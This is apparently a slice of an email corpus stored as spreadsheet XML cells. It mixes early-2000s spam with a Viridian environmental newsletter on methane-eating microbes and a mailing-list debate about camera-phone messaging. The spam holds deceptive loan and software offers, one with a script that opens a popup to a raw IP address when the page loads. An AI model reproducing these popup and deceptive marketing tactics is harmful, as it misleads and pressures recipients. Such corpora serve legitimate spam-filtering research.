 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"3" cellspacing=3D"0" width=3D"85%" bgcolor=3D"#E8E8E8" =
 bordercolor=3D"#C0C0C0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bgcolor=3D"#E8E8E8"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Your info=
 rmation is confidential, it will not be sold or used for any other purpose,=
  and you are under no obligation=2E
         Your information will be used solely for the purpose of evaluating=
  your business or website for a merchant account so that you may begin acce=
 pting credit card payments=2E&lt;/b&gt;&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/form&gt;
 &lt;p align=3D"center"&gt;
 &lt;br&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FF0000"&gt;List
  Removal/OPT-OUT Option&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-1&gt;&lt;a
  href=3D"mailto:ieg012@yahoo=2Ecom?subject=3Dremove"&gt;Click
  Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;m
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0--
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Viridian Note 00330: Ocean Bugs
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts: microbes, methane,
 Black Sea, Big Mike the Viridian Bug
 Attention Conservation Notice:   Continues
 the Viridian obsession with ecologically
 active micro-organisms.
 Links:
 GM to give away thousands of electric vehicles - USA 
 http://www.planetark.org/dailynewsstory.cfm/newsid/17318/story.htm
 Sinking Pacific states slam US over sea levels - FIJI 
 http://www.planetark.org/dailynewsstory.cfm/newsid/17316/story.htm
 Famished Australian emus invade drought-hit farms - 
 AUSTRALIA 
 http://www.planetark.org/dailynewsstory.cfm/newsid/17330/story.htm
 ---------------------------------------------------
 Entries in the Global Civil Society Design Contest.
 From: Steven W. Schuldt &lt;swschuldt*mac.com&gt;
 http://www.americanrobotz.com/images2/Soon_GlobalCivilSoci
 etyLaptop.jpg
 From: Ben Davis &lt;bend*earthlink.net&gt;
 http://www.digitaleverything.com/GlobalComputer.htm
 From: Joerg F. Wittenberger &lt;Joerg.Wittenberger*pobox.com&gt;
 http://www.askemos.org/ 
 http://www.askemos.org:9080/RomePaper.pdf
 From: Scott Vandehey &lt;scot*spaceninja.com &gt;
 http://spaceninja.com/viridian/notebook.html
 From: Bob Morris &lt;bob*bomoco.com&gt;
 http://viridianrepository.com/GlobalCivil/
 From: Anonymous
 http://home.freiepresse.de/befis/zx2000.html
 http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
 http://www.vkb.co.il/
 From: Jim Thompson &lt;jim*musenki.com&gt;
 http://www.simputer.org
 http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.html
 From: Mike Rosing &lt;eresrch*eskimo.com&gt;
 http://www.eskimo.com/~eresrch/viridian
 From: Till Westermayer &lt;till*tillwe.de&gt;
 http://www.westermayer.de/till/projekte/02gcsdl.htm
 From:Duncan Stewart &lt;stewarts*stewarts.org?&gt;
 http://www.stewarts.org/viridian/GCS
 From: R. Charles Flickinger &lt;idlewild*mac.com&gt;
 http://homepage.mac.com/iHUG/GCS2000.html
 From: Kevin Prichard &lt;kevin*indymedia.org&gt;
 http://www.nah6.com/
 http://www.nah6.com/nah6-h2k2_files/v3_document.html
 From: Dave Phelan &lt;dphelan*pavilion.co.uk
 http://www.btinternet.com/~dphelan/viridian/gcs-computer.html
 From:"Dan Reynolds" &lt;orion_obrien*hotmail.com&gt;
 http://www.nv2.cc.va.us/home/alwhite2/flotsam1.htm 
 From: John Romans  &lt;joro*panicfire.net&gt;
 http://www.panicfire.net/cryptoviridian.htm 
 From:  "Allen Wong" &lt;threadprinter*hotmail.com&gt;
 http://www.fieldsync.com/viridian/ 
 From: "Joel Westerberg" &lt;joel*unsafe.nu&gt;
 "Here's my contest entry.  Cheers." 
 http://www.unsafe.nu/bigmike/global.PDF 
 From:  "Chris McCormick" &lt;chris*mccormick.cx&gt;
 "Hi,  I hope i'm not too late!" 
 http://mccormick.cx/viridian/ 
 "Regards,  Chris."
 http://www.mccormick.cx 
 http://www.sciencegirlrecords.com 
 From:  "adrian cotter" &lt;acotter*nonsensical.com&gt;
 "As usual I'm cutting the deadline close... But I've 
 honestly been thinking about this one for a good month.  
 If only I had one of these, my life would be better."
 http://www.nonsensical.com/viridian/notebook/ 
 From: "jg"  &lt;jg@solarpc.com&gt;
 "Emperor Bruce, here it is."
 http://solarpc.com/contest.htm 
 From: Kevin Prichard &lt;musicasa*prichard.org&gt;
 Subject: link to Kevin Prichard's own
 global civ design entry
 http://prichard.org/viridian_globcivsoc.html
 This contest has now expired.   A winner will
 be announced at the discretion of our judge.
 ----------------------------------------------------
 Source:
 http://www.planetark.org/dailynewsstory.cfm/newsid/17250/story.htm
 "Germans discover ancient life, offer climate hope"
 by Philip Blenkinsop 
 GERMANY: August 12, 2002
 "BERLIN == German scientists have discovered micro-
 organisms deep under the sea that may provide an insight 
 into some of the earth's first lifeforms and offer hope in 
 the fight against global warming, the Max Planck Society 
 said. 
     "The marine biologists and geologists believe they 
 have shown life could have existed by processing methane 
 without the presence of oxygen.
     "Their findings could also prove useful in ridding the 
 earth of excess methane, one of the greenhouse gases many 
 scientists believe is responsible for global warming.
     "Traditional views of early life on earth centre on 
 plants which converted carbon dioxide to oxygen.
      "'These (plant lifeforms) date back to between three 
 and 3.5 billion years ago... We have found biomass (large 
 cluster of organisms) using methane that geologists show 
 could have existed around four billion years ago,' 
 Professor Antje Boetius, joint author of the study, told 
 Reuters.
 Link:
 Yes, she exists.  Dr. Antje does more than exist.  She
 gives some kinda publicity shot.  Dang!
 http://www.mpi-bremen.de/deutsch/biogeo/aboetius/aboetius.html
 http://www.iu-bremen.de/directory/faculty/01063/
       "The two-year research by the scientists from 
 Hamburg University, the Alfred Wegener Institute in 
 northern Bremerhaven and the Max Planck Society centred on 
 coral-forming micro-organisms in the Black Sea at depths 
 where no oxygen and no light is present.
      "The Black Sea contains the largest oxygen-free basin 
 in the world.
      "The lifeforms were able to process methane together 
 with sulphates within the water, producing carbonates, in 
 the form of coral, as waste.  (((Black, oxygen-free 
 "coral".  I wonder what that stuff looks like.  Maybe you 
 could make jewelry out of it.)))
      "That they were able to do so without oxygen suggests 
 they may have been around before plant life.
       "'Perhaps micro-organisms like those found in the 
 Black Sea were the original inhabitants of the earth 
 during a long period of the earth's history,' said 
 Boetius.  (((Yeah, they've just been sitting down there, 
 waiting to save our bacon.)))
      "She believes the findings could prove useful for 
 climate control.
      "Previously, scientists had thought that methane, 
 found in abundance in the sea and produced through 
 agriculture, could only be broken down with oxygen.
       "The German researchers believe the discovery of a 
 pool of organisms that process methane without oxygen 
 could lead to a way of cutting down potentially harmful 
 greenhouse gases without burning oxygen and producing 
 similarly damaging carbon dioxide.  (((What do they 
 *smell* like?)))
      "'It could be a way of hindering climate 
 catastrophe,'" Boetius said. 
 O=c=O O=c=O O=c=O
 BY ALL MEANS 
 LET'S HINDER SOME
 CATASTROPHE
 O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">right Mike,
 i will agree to disagree but i take your comments to heart.  my opinion is
 only that this is one of the last frontiers of communications ('instant
 show') that we cross easily (though you are right as rain on pricing).  i am
 mildly amused at the level of skepticism and innatention it is getting.
 my premise is that the world will change in dramatic and unexpected ways
 once there are a billion 'eye's' which can instantly share what they see
 amongst each other.  that doesn't mean that people will stop talking on
 their phones, or that people will spend more time w/images than voice.  just
 that it is fundamental.  from news to crime to privacy to dating to family
 life to bloopers and practical jokes, i believe there will be an explosion
 of images unleashed specifically by cell phone integrated lenses because of
 their utter ubiquity that dwarfs all pictures taken in the history of
 photography by orders of magnitude and in short order. and yes, changes
 things 'big time'.
 rgds,
 rob
 -----Original Message-----
 From: Mike Masnick [mailto:mike@techdirt.com]
 Sent: Tuesday, August 20, 2002 11:58 PM
 To: Rob Shavell
 Cc: fork@spamassassin.taint.org
 Subject: RE: sprint delivers the next big thing??
 Not to keep harping on this, but...
 At 11:36 PM 8/20/02 -0700, Rob Shavell wrote:
 &gt;content: who cares about content?  that no one can think of 'useful'
 content
 &gt;is always the business persons mistake. the content is the users
 &gt;communications.  its anything and everything.  avg person could easily send
 &gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 &gt;cares if content is trivial in nature. picture speaks a thousand words.
 This does nothing to answer my question.  I *do* care about content.  Hell,
 if I could be convinced that people would send stupid pics back and forth
 all day, I'd have a different opinion of this.  I just am not convinced
 that they will (stupid or not).
 While a picture may be worth a thousand words (and this is the same
 argument the guy who works for me made), how many people do you know who
 communicate by pictures?  Sure, it sounds nice to say that a picture is
 such an efficient messaging mechanism, but how often do you actually find
 yourself drawing someone a picture to explain something?
 I don't buy it.
 For most messages, text works fine and is the most efficient
 mechanism.  For some messages, pictures do the job, but I would say not
 nearly as often as words.  Why do you think Pictionary and Charades and
 such are games?  Because images are usually not the most efficient way to
 get a message across.
 &gt;misc ramblings: i suppose you skeptical forkers would have said the same
 &gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
 &gt;resultion elswhere.  and yet, it had great decentralizing impact - the
 plant
 &gt;had to be downsized and pushed to the retail operation - the digital
 camera,
 &gt;and finally the integrated digital camera phone brings this cycle of
 &gt;decentralization in photography to a logical conclusion (which will put the
 &gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
 &gt;didn't take off because its easy, it took off because it costs less.  its
 &gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 &gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
 &gt;SMS cannibilizes the voice rev's they bought their networks to handle.
 Again, this is the same argument my colleague made (along with "you just
 don't understand kids today, and they'll run with this").  I wasn't saying
 that MMS wouldn't take off because it wasn't high quality or that it wasn't
 easy.  I was saying that I couldn't see why people would use it in a way
 that "changed the face of communications".
 I'm looking for the compelling reason (even if it's a stupid one) why
 people would want to do this.  Sure, if they integrate cameras into the
 phone, and the quality improves (even only marginally) I can certainly see
 people taking pictures with their cameras and occasionally sending them to
 other people.  But, mostly, I don't see what the benefit is to this over
 sending them to someone's email address, or putting together an online (or
 offline) photoalbum.
 I don't think 1 hour photos are trivial.  People want to see their own pics
 right away, and the quality is plenty good enough for snapshots.  That's
 one of the main reasons why digital cameras are catching on.  The instant
 view part.  I'm guessing your argument is that people not only want
 "instant view", but also "instant show".  Which is what this service
 offers.  I'm not convinced that most people want "instant show".  I think
 people like to package their pictures and show them.  That's why people put
 together fancy albums, and sit there and force you to go through them while
 they explain every picture.  Sure, occasionally "instant show" is nice, but
 it's just "nice" on occasion.  I still can't see how it becomes a integral
 messaging method.
 What's the specific benefit of taking a picture and immediately sending it
 from one phone to another?  There has to be *some* benefit, even if it's
 silly if people are going to flock to it.
 I'm searching... no one has given me a straight answer yet.
 The *only* really intriguing idea I've heard about things like MMS lately
 are Dan Gillmor's assertion that one day in the near future some news event
 will happen, and a bunch of people will snap pictures with their mobile
 phones, from all different angles, and those photos tell the real story of
 what happened - before the press even gets there.
 Willing to be proven wrong,
 Mike
 PS If the wireless carriers continue to price these services as stupidly as
 they currently are, then MMS is *never* going to catch on.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You Are Approved!!! (556486)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;BODY onLoad="(window.open('http://81.9.8.38/bdvs/'))"&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4" color="#0000FF"&gt;Our Loan Packages Have
 Never Been More Attractive!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#000000" face="Arial"&gt;Now is the time to refinance your
 home or get a second mortgage to consolidate &lt;br&gt;
 all of your high interest&amp;nbsp;credit card debt. Get all the Smart Cash you'll need!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" color="#0000FF"&gt;Cash out your equity while rates
 are low!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" color="#D6321B"&gt;All USA Homeowners Easily Qualify!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;span style="background-color: #FFFF00"&gt;Damaged
 Credit Is never a problem!&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font size="3"&gt;&amp;nbsp;&lt;/font&gt;We work with
 nation-wide lenders that are offering great deals&amp;nbsp;&lt;br&gt;
 &amp;nbsp;and &lt;/font&gt;&lt;fontface="Arial" color="#000000"&gt;will provide you with the best service on the INTERNET!&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Arial"&gt;&lt;font color="#D6321B"&gt;&lt;b&gt;Our service is 100% free!&lt;/b&gt;&lt;/font&gt;&lt;font
 size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;a href="http://81.9.8.38/bdvs/"&gt;&lt;b&gt;&lt;font color="#d6321b"&gt;CLICK HERE For more details and
 to receive a no obligation quotation today!&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Arial" color="#000000" size="2"&gt;&lt;i&gt;We strongly oppose the
 use of SPAM email and do not want anyone who does not wish to receive&amp;nbsp;&lt;br&gt;
 our&amp;nbsp;mailings to receive them. Please click here to be deleted from further
 communication&lt;br&gt;
 &lt;/i&gt;&lt;/font&gt;&lt;a href="http://81.9.8.38/bdvs/remove_page.htm"&gt;&lt;font face="Arial"
 color="#0000ff" size="2"&gt;Click Here to unsubscribe from future promotions.&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ***********************************
 3419
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DON'T LET A COMPUTER VIRUS RUIN YOUR DAY           32448
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"3" cellspacing=3D"3" width=3D"80%" cellpadding=3D"3" bg=
 color=3D"#808080" bordercolor=3D"#C0C0C0" style=3D"border-collapse: collap=
 se"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%"&gt; 
         &lt;p align=3D"center"&gt;
         &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"5" co=
 lor=3D"#FFFF00"&gt;&lt;b&gt;Norton 
           SystemWorks 2002 Software Suite&lt;br&gt;
           Professional Edition&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font size=3D"5" color=3D"#FFFFFF" face=3D"Arial, Helvetica, sans-=
 serif"&gt;6&lt;/font&gt;&lt;font size=3D"5"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif=
 " size=3D"4" color=3D"#FFFFFF"&gt; 
           Feature-Packed Utilities, &lt;/font&gt;&lt;font face=3D"Arial, Helvetica,=
  sans-serif" size=3D"4" color=3D"#000000"&gt; 
         &lt;font color=3D"#FFFFFF"&gt;1&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sa=
 ns-serif" size=3D"4" color=3D"#FFFFFF"&gt; Great Price&lt;br&gt;
           A &lt;/font&gt; &lt;font color=3D"#FFFFFF"&gt;$300.00+&lt;/font&gt;&lt;font face=3D"A=
 rial, Helvetica, sans-serif" size=3D"4" color=3D"#FFFFFF"&gt; Combined Retail=
  Value for Only &lt;/font&gt; 
           &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#F=
 FFFFF"&gt;$29.99!&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"4=
 " color=3D"#FFFFFF"&gt;&lt;br&gt;
           Includes &lt;/font&gt; &lt;font color=3D"#FFFFFF"&gt;FREE&lt;/font&gt;&lt;font face=3D=
 "Arial, Helvetica, sans-serif" size=3D"4" color=3D"#FFFFFF"&gt; Shipping!&lt;/fo=
 nt&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFFF"&gt;Don'=
 t 
         allow yourself to fall prey to destructive viruses&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFFF"&gt;Prot=
 ect 
         your computer and your valuable information&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#FF0000" size=3D=
 "5"&gt;
       &lt;a href=3D"http://211.141.69.11:5911/systemworks.htm" style=3D"text-=
 decoration: none; background-color: #FFFF00"&gt;
       &lt;font color=3D"#000000"&gt;CLICK &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;HERE&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt; 
       FOR MORE INFO AND TO ORDER&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"=
 &gt;
     ______________________________________________________________________=
 _________&lt;/font&gt;&lt;/p&gt;
     &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"=
 &gt;We hope you enjoy 
 receiving &lt;b&gt;Marketing Co-op&lt;/b&gt;'s special offer emails. You have received=
  this 
 special offer because you have provided permission to receive third party =
 email 
 communications regarding special online promotions or offers. However, if =
 you 
 wish to unsubscribe from this email list, please &lt;/font&gt;
 &lt;font face=3D"Tahoma" size=3D"1" color=3D"#666666"&gt;
 &lt;a href=3D"mailto:REMOVEME@btamail.net.cn"&gt;&lt;font color=3D"#FFFFFF"&gt;click h=
 ere&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"&gt;. 
 Please allow 2-3 weeks for us to remove your email address. You may receiv=
 e 
 further emails from&lt;br&gt;
 us during that time, for which we apologize. Thank you.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: China Motorcycle
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Unlimited Cash Bonuses!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_646288_01C20FAE.3A8A1810
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Unlimited Cash Bonuses!=09
  Unlimited Cash Bonuses!
  	 Earn $75 Cash Bonus on every Allianz Annuity, EVERY TIME!=09
  From M&amp;O Marketing on each and every Allianz Life Annuity Product! =09
 =20
  Want an Additional $50 per App?=0A=
 now earn $125 cash bonuses EVERY TIME!
 BonusDex (9% Comm) 	$75 Bonus + $50 Extra Bonus =3D $125 Bonus! =09
 FlexDex Bonus* (9% Comm) 	$75 Bonus + $50 Extra Bonus =3D $125
 Bonus! =09
 Power 7 (6% Comm) 	$75 Bonus + $50 Extra Bonus =3D $125 Bonus! =09
 POWERHOUSE (9% Comm)	 $75 Bonus + $50 Extra Bonus =3D $125 Bonus! =09
 ? Extra $50 bonus on BonusDex, FlexDex Bonus*, Power 7, and
 POWERHOUSEonly ? =09
  =20
 =20
 Call or e-mail &lt;mailto:marketing@mandomarketing.com&gt;  us right away!
 Offer expires July 31, 2002!
   800-862-0959
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 =20
  M and O Marketing
 Offer expires July 31, 2002. No limit to how much extra cash you can
 earn. Offer Subject to change without notice. Products not available in
 all states. *Issued as the FlexDex Annuity in CT. Bonuses issued from
 M&amp;O Marketing on paid, issued business.=20
 BonusDex Annuity is not available in: MA, OR, PA, WA and WI. Power 7 is
 not available in: AL, IN, ME, NJ, OR, PA and WA. POWERHOUSE is not
 available in: ND, OR, SC and WA. FlexDex is not available in: ND, OR, SC
 and WA. For agent use only. =09
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_646288_01C20FAE.3A8A1810
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Unlimited Cash Bonuses!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 bordercolor=3D"#000000" border=3D"1" align=3D"center" =
 bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-101.gif" width=3D"550" =
 height=3D"63" alt=3D"Unlimited Cash Bonuses!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-102.gif" =
 alt=3D"Unlimited Cash Bonuses!" width=3D"245" height=3D"163"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-104.gif" width=3D"245" =
 height=3D"86"&gt;=20
           &lt;/td&gt;
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-103.gif" width=3D"305" =
 height=3D"280" alt=3D"Earn $75 Cash Bonus on every Allianz Annuity, =
 EVERY TIME!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td bgcolor=3D"#000066" align=3D"center"&gt;
             &lt;b&gt;&lt;font color=3D"#FFFF00" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;img src=3D"http://iiq.us/images/mando/bonus/spacer.gif" =
 width=3D"1" height=3D"25" align=3D"absmiddle"&gt;
             From M&amp;amp;O Marketing on each and every Allianz Life =
 Annuity Product!&lt;/font&gt;&lt;/b&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/mando/bonus/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/mando/bonus/20020522-2.gif" =
 width=3D"512" height=3D"73" alt=3D"Want an Additional $50 per =
 App?&amp;#10;now earn $125 cash bonuses EVERY TIME!"&gt;=20
             &lt;br&gt;
             &lt;font face=3D"Times New Roman, Times, serif"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"41%" align=3D"center" bgcolor=3D"#CCFFFF"&gt;
                   &lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;BonusDex (9% Comm)&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"59%" align=3D"center" bgcolor=3D"#CCFFFF"&gt;
                   &lt;b&gt;&lt;font size=3D"2" color=3D"#0000FF"&gt;$75&lt;/font&gt;&lt;font =
 size=3D"2"&gt;=20
                   Bonus + &lt;font color=3D"#0000FF"&gt;$50&lt;/font&gt; =
 &lt;i&gt;Extra&lt;/i&gt; Bonus=20
                   =3D &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;$125&lt;/font&gt;&lt;font color=3D"#FF0000"&gt;=20
                   Bonus!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"41%" align=3D"center"&gt;
                   &lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;FlexDex Bonus* (9% Comm)&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"59%" align=3D"center"&gt;
                   &lt;b&gt;&lt;font size=3D"2" color=3D"#0000FF"&gt;$75&lt;/font&gt;&lt;font =
 size=3D"2"&gt;=20
                   Bonus + &lt;font color=3D"#0000FF"&gt;$50&lt;/font&gt; =
 &lt;i&gt;Extra&lt;/i&gt; Bonus=20
                   =3D &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;$125&lt;/font&gt;&lt;font color=3D"#FF0000"&gt;=20
                   Bonus!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"41%" align=3D"center" =
 bgcolor=3D"#CCFFFF"&gt;&lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;Power 7 (6% Comm)&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"59%" align=3D"center" bgcolor=3D"#CCFFFF"&gt;
                   &lt;b&gt;&lt;font size=3D"2" color=3D"#0000FF"&gt;$75&lt;/font&gt;&lt;font =
 size=3D"2"&gt;=20
                   Bonus + &lt;font color=3D"#0000FF"&gt;$50&lt;/font&gt; =
 &lt;i&gt;Extra&lt;/i&gt; Bonus=20
                   =3D &lt;font color=3D"#FF0000" size=3D"3"&gt;$125 =
 &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;Bonus!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"41%" align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2" =
 face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;POWERHOUSE (9% =
 Comm)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"59%" align=3D"center"&gt;
                   &lt;b&gt;&lt;font size=3D"2" color=3D"#0000FF"&gt;$75&lt;/font&gt;&lt;font =
 size=3D"2"&gt;=20
                   Bonus + &lt;font color=3D"#0000FF"&gt;$50&lt;/font&gt; =
 &lt;i&gt;Extra&lt;/i&gt; Bonus=20
                   =3D &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;$125&lt;/font&gt;&lt;font color=3D"#FF0000"&gt;=20
                   Bonus!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2" align=3D"center"&gt;
                   &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;
                   &amp;#151; Extra $50 bonus on BonusDex, FlexDex Bonus*, =
 Power 7, and POWERHOUSEonly &amp;#151;&lt;/font&gt;=20
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000000"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bonus/spacer.gif" width=3D"8" =
 height=3D"8"&gt;&lt;br&gt;
             &lt;b&gt;Call or &lt;a =
 href=3D"mailto:marketing@mandomarketing.com"&gt;e-mail&lt;/a&gt;=20
             us right away! Offer expires July 31, 2002!&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-301.gif" width=3D"52" =
 height=3D"128"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bonus/20020522-302.gif" width=3D"442" =
 height=3D"128" alt=3D"800-862-0959"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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value=3D"marketing@mandomarketing.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"M&amp;O Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/mando/bonus/20020522-4.gif" =
